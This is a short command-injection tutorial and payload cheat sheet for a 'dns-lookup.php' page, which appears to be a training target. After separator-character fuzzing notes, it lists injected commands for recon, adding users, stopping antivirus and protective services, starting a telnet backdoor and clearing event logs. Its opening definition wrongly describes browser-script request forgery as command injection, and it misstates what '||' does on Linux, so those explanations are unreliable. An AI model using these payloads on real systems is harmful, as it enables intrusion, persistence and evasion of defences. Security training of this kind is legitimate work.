Command Injection (CMDi) Overview, Discovery ,Example ,Exploitation



Command Injection may occcur when an attacker is able to run script into a users browser. To forge a legitimate request, the script creates and send the same parameters to the target website that would be sent if the user had submitted the legitimate form themselves. The target website knows the request has come from the users browser but cannot detect that the request was created and sent by a malicious script running in the users browser. As far as the target site can tell, the user submitted the request by using the web site in the expected way.

Discovery Methodology

Fuzz with command separators like ;, & and && depending on if you are using Linux or Windows respectively. Look for errors that are related to operating system errors, delays in responses which can be repeated by repeating the injection, or unexpected output in the response. The error may appear as an HTML comment.

Attempt to determine the operating system type.

Reserved characters used in fuzzing for command injection

&: Used to separate multiple commands on one command line. Runs the first command then the second command.

&&: Used to run the command following && only if the preceding command is successful.

|| (Windows): Used to run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully.

|| (Linux): Redirects standard output of the first command to standard input of the second command.

( ): Use to nest commands.

#: Command line comment symbol


Inject operating system commands methodically. "ls" and "dir" are reasonably good commands to attempt since most user accounts will have permission to execute directory listings by default and these two commands tend to be exclusive (Windows will not typically execute "ls" and Linux will typically not execute "dir" but this behavior absolutely varies)

Prefix the injections with each of the reserved characters then for each prefix suffix each injection as well.


Examples for page "dns-lookup.php"

Recon: Discover available functionality
using provided help Windows XP: && help Linux: && <cmd> --help Linux: && man <cmd> Recon: Determine current directory Windows XP: && dir Linux: && pwd Recon: Chain commands to discover driectory structure Windows XP: && cd ../../.. && dir Linux: && cd ../../.. && ls -l Scanning: Get machine network settings, hostname,
DNS servers, subnet mask, etc. Windows XP: && ipconfig /all Linux: && ifconfig Scanning: Discover hosts on network Windows XP: && ping -n 1 Linux: && ping -c 1 Scanning: Enumerate Current user Windows XP: && set Linux: && whoami Scanning: Enumerate computers, users, groups,
AD computers, AD users, AD groups Windows XP: && net view [/domain] Windows XP: && net user [/domain] Windows XP: && net localgroup [/domain] Gaining Access: Add user Windows XP: && net user <username> /add Linux: useradd <username> Gaining Access: Delete user Windows XP: && net user <username> /delete Maintain Access: kill AV net stop <av process> Maintain Access: Kill AV/protective services or
open backdoor services Windows XP: && net stop <service name> Windows XP: && net start telnet Windows XP: && net stop telnet Cover Tracks: Clear logs Windows XP: && wevtutil cl


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